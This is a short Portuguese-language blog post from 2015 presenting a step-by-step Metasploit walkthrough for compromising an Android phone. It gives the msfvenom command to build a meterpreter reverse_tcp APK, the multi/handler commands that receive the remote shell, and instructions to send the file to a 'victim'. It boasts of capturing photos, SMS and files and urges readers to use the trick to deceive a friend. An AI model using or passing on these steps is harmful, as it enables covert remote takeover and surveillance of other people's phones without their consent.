quinta-feira, 26 de novembro de 2015

Metasploit: invadindo sistema Android ( reverse_tcp ) com [Msfvenon]/[Msfpayload]

Ae galera, hoje eu fiz minha primeira invasao no Android utilizando o Metasploit.


Foi simples, primeiro criei um payload usando o modulo meterpreter/reverse_tcp.


apos isto eu mandei o payload para vitima no caso meu celular.


apos isto eu iniciei o exploit.


exploit/multi/handler


setei o payload que usei ( android/meterpreter/reverse_tcp )


configurei a porta e o IP local, e dei um exploit, apos isto foi so a vitima abrir o payload, e BOMBA, a sessao abriu utilizando o meterpreter.


Com ele ativo, consegui tirar fotos, capturar fotos, SMS, execuçao de programas, baixar arquivos.


Fantastico, voce que quer engana um amigo seu segue a dica ;)


comandos que eu uitlizei:


msfvenon or msfpayload -p android/meterpreter/reverse_tcp LHOST=seuip LPORT=4444(DEFAULT) R > nome do aquivo.apk

 

ele vai estar no diretorio principal, de um "ls".


apos isto mande o payload para vitima.


abra o MSFCONSOLE.


comandos:


use exploit/multi/handler


set PAYLOAD android/meterpreter/reverse_tcp


agora configure sua LHOST dnv


set LHOST seuip


apos isto de um "exploit"


Quando a vitima abrir seu payload ira abrir a sessao e ae voce da um help, e agora so brincar com seu amigo >:D

 

fotos:

 



 

Nenhum comentário:

Postar um comentário